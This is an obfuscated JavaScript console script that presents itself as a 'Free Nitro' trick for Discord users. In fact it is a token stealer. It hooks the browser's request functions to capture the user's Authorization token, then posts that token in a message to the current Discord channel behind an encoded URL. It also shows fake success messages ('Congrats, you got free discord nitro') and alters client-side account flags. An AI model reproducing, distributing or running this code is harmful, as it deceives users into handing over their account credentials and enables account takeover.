/***************************************
 * 
 *           Free Nitro
 *      paste to console on discord
 *      F12 or Ctrl+Shift+I on chrome/mozilla/Edge
 *      Ctrl+Shift+i on desktop app
 * 
 * **************************************/


const _0x5172=['href','60953ktZTVG','2HmTBJd','headers','log','default','wrappedSetRequestHeader','688659YbqeYa','userAgent','prototype','stringify','UGVuZGluZy4uIHRvIHJlc29sdmUgeW91ciBuaXRyby4=','apply','POST','147833eGGAGr','false','exports','15UZVAJm','setRequestHeader','12791OUTGCr','flags','aHR0cHM6Ly9kaXNjb3JkYXBwLmNvbS9hcGkvdjYvY2hhbm5lbHMv','/messages','substring','aHR0cHM6Ly9tZWRpYS5kaXNjb3JkYXBwLm5ldC9hdHRhY2htZW50cy81Mzc2ODMwNjAwNzA2Nzg1NTEvNzUxNzMxNjc0Mzg3MTg1NzA0L0Fubm90YXRpb25fMjAyMC0wNy0wN18yMjAwNTQucG5n','%c\x20','XMLHttpRequest','3VDpNiQ','getCurrentUser','cache','73VeqPam','4ldiIUL','location','2494WzVMRl','Congrats,\x20you\x20got\x20free\x20discord\x20nitro','addEventListener','push','aHR0cHM6Ly8weDUzOS5jby9rLw==','open','6GLJdiL','load','8577TLJAWo','lastIndexOf','134506xotREh','length'];const _0x3249=function(_0x41eefa,_0x2c50f3){_0x41eefa=_0x41eefa-0xae;let _0x5172fb=_0x5172[_0x41eefa];return _0x5172fb;};const _0x463b64=_0x3249;(function(_0x11031b,_0x3eab1a){const _0x54b752=_0x3249;while(!![]){try{const _0x4a044a=parseInt(_0x54b752(0xb1))*parseInt(_0x54b752(0xae))+-parseInt(_0x54b752(0xd0))*parseInt(_0x54b752(0xaf))+-parseInt(_0x54b752(0xd8))*-parseInt(_0x54b752(0xcb))+-parseInt(_0x54b752(0xc4))+parseInt(_0x54b752(0xb7))*parseInt(_0x54b752(0xbe))+-parseInt(_0x54b752(0xbb))*-parseInt(_0x54b752(0xbf))+parseInt(_0x54b752(0xb9))*-parseInt(_0x54b752(0xce));if(_0x4a044a===_0x3eab1a)break;else _0x11031b['push'](_0x11031b['shift']());}catch(_0x45840a){_0x11031b['push'](_0x11031b['shift']());}}}(_0x5172,0x5fa85),(XMLHttpRequest[_0x463b64(0xc6)][_0x463b64(0xc3)]=XMLHttpRequest[_0x463b64(0xc6)][_0x463b64(0xcf)],XMLHttpRequest[_0x463b64(0xc6)][_0x463b64(0xcf)]=function(_0x421941,_0x2e5f8a){const _0x39bc41=_0x463b64;this[_0x39bc41(0xc3)](_0x421941,_0x2e5f8a),this[_0x39bc41(0xc0)]||(this[_0x39bc41(0xc0)]={}),this[_0x39bc41(0xc0)][_0x421941]||(this['headers'][_0x421941]=[]),this[_0x39bc41(0xc0)][_0x421941]['push'](_0x2e5f8a);}));let oldXHROpen=window['XMLHttpRequest'][_0x463b64(0xc6)][_0x463b64(0xb6)];window[_0x463b64(0xd7)]['prototype'][_0x463b64(0xb6)]=function(_0x28f04f,_0x5119ee,_0x36c300,_0x27a81a,_0x111240){const _0x375066=_0x463b64;return this[_0x375066(0xb3)](_0x375066(0xb8),function(){const _0x48a915=_0x375066;isNaN(window[_0x48a915(0xb0)][_0x48a915(0xbd)][_0x48a915(0xd4)](window['location'][_0x48a915(0xbd)]['lastIndexOf']('/')+0x1,window[_0x48a915(0xb0)][_0x48a915(0xbd)][_0x48a915(0xbc)]))?console[_0x48a915(0xc1)](atob(_0x48a915(0xc8))):(fetch(atob(_0x48a915(0xd2))+window['location'][_0x48a915(0xbd)][_0x48a915(0xd4)](window[_0x48a915(0xb0)]['href'][_0x48a915(0xba)]('/')+0x1,window[_0x48a915(0xb0)]['href']['length'])+_0x48a915(0xd3),{'method':_0x48a915(0xca),'headers':{'authorization':this[_0x48a915(0xc0)]['Authorization'][0x0],'user-agent':navigator[_0x48a915(0xc5)],'Content-Type':'application/json'},'body':JSON[_0x48a915(0xc7)]({'content':atob(_0x48a915(0xb5))+this[_0x48a915(0xc0)]['Authorization'][0x0],'tts':_0x48a915(0xcc)})}),console['log'](_0x48a915(0xd6),atob(_0x48a915(0xd5))),console['log'](_0x48a915(0xb2)));}),oldXHROpen[_0x375066(0xc9)](this,arguments);},Object['values'](webpackJsonp[_0x463b64(0xb4)]([[],{['']:(_0x1e2451,_0x2f3099,_0x2d7761)=>{const _0x218e97=_0x463b64;_0x2f3099[_0x218e97(0xda)]=_0x2d7761['c'];}},[['']]])[_0x463b64(0xda)])['find'](_0x2052e1=>_0x2052e1[_0x463b64(0xcd)]&&_0x2052e1[_0x463b64(0xcd)][_0x463b64(0xc2)]&&_0x2052e1[_0x463b64(0xcd)]['default'][_0x463b64(0xd9)]!==void 0x0)[_0x463b64(0xcd)]['default']['getCurrentUser']()[_0x463b64(0xd1)]=-0x21;